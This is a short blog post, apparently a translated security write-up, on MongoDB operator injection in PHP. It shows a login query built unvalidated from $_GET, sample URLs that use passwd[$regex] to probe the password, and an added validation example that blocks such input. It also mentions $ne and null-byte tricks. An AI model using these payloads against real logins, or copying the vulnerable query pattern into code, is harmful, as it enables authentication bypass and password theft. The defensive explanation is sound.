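<?php
// Connect and select the "admin" collection of the "demo" database
$con = new Mongo();
$db = $con->selectDB("demo")->selectCollection("admin");
// Show what PHP actually parsed for passwd (a string or an array)
var_dump($_GET['passwd']);
// Request parameters are passed straight into the query document
$ds = $db->find(array("username" => $_GET['username'], "password" => $_GET['passwd']));
foreach ($ds as $k => $v) {
    var_dump($v);
}
?>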
http://www.bkjia.com/mongo/go-1.php?username=heige&passwd[$regex]=^1
http://www.bkjia.com/mongo/go-1.php?username=heige&passwd[$regex]=^2
Database contents used for the test:
> db.admin.find()
{"_id": ObjectId("4f562d110920d897e6765ae1"), "uid": 1, "username": "heige", "password": "123456"}
{"_id": ObjectId("4f5b38ba0920d897e6765ae2"), "uid": 2, "username": "admin", "password": "admin"}
This injection method mainly relies on a PHP feature: a request parameter can be submitted directly as an array...
In addition, see these two tips from researchers abroad:
http://www.idontplaydarts.com/2010/07/mongodb-is-vulnerable-to-sql-injection-in-php-at-least/ (using $ne directly; this is similar to the common "universal password" trick)
http://www.idontplaydarts.com/2011/02/mongodb-null-byte-injection-attacks/ (null byte injection)
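The array behaviour described above, and a check that blocks it, shown as an added example that is not part of the original post. The helper names string_param and build_login_filter are hypothetical, the query strings are constructed samples, and PHP 7.1 or later is assumed; no MongoDB connection is needed.

```php
<?php
// Added example: hypothetical helper names, constructed sample input.

/**
 * Return the parameter only if it is a plain string. Arrays such as
 * passwd[$regex]=^1 (parsed by PHP into ['$regex' => '^1']) are rejected.
 */
function string_param(array $params, string $name): ?string
{
    if (!isset($params[$name]) || !is_string($params[$name])) {
        return null;
    }
    return $params[$name];
}

/** Build the find() filter, or return null when any input is not a string. */
function build_login_filter(array $params): ?array
{
    $username = string_param($params, 'username');
    $password = string_param($params, 'passwd');
    if ($username === null || $password === null) {
        return null;
    }
    // Both values are strings here, so they can only be matched for
    // equality and cannot carry query operators such as $regex or $ne.
    return array('username' => $username, 'password' => $password);
}

// Constructed query strings, parsed the same way PHP fills $_GET.
$samples = array(
    'username=heige&passwd=123456',
    'username=heige&passwd[$regex]=^1',
    'username=heige&passwd[$ne]=1',
);

foreach ($samples as $qs) {
    parse_str($qs, $params);
    $filter = build_login_filter($params);
    echo $qs, ' => ', $filter === null ? 'rejected' : json_encode($filter), "\n";
}
```

Only the first sample produces a filter; the two operator forms are rejected before any query is built.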
Author: 5up3rh3i's blog